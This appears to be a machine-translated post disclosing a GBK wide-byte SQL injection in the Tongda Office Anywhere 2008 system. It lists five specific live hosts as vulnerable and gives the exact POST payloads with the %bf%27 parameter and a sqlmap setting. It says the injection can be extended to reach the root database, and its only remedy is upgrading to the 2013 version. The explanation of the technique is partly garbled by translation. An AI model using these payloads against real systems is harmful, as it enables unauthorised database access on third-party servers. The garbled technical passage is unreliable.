General SQL Injection exists in a system of Tongda OA (with injection techniques)
Recently learned SQL Injection
In fact, it's only common. Is there an error-based injection to verify the version?
Office Anywhere 2008 network smart Office System
Mysql + win + php
Instance:
Http: // 219.139.134.9: 70/logincheck. php
Http://www.ccas.com.cn: 8008/logincheck. php
Http: // 122.144.134.79/logincheck. php
The above three (explicit error) post
PASSWORD = g00dPa % 24% 24w0rD & UNAME = % bf % 27
Http: // 123.233.240.119/logincheck. php (http header injection exists)
Http: // 61.175.246.20/logincheck. php (sqlmap-level = 2)
The above two (no explicit error) post PASSWORD = g00dPa % 24% 24w0rD & submit = % b5 % c7 % 20% c2 % bc & UI = 0 & UNAME = % bf % 27
2008 if all versions are available, you can change the parameter slightly to the root master database.
Appendix: Why is the parameter % bf % 27?
When MYSQL uses GBK encoding, % df % 5c is considered to be a wide character, that is, "running (apply XEYES Niu jiyan)
% 27 after % bf triggered the wide-text section is a single quotation mark error.
If it is % bf '% bf % 22, sqlmap cannot run, so don't count on the scanner
Solution:
Upgrade 2013
In version 2013, % bf is invalid.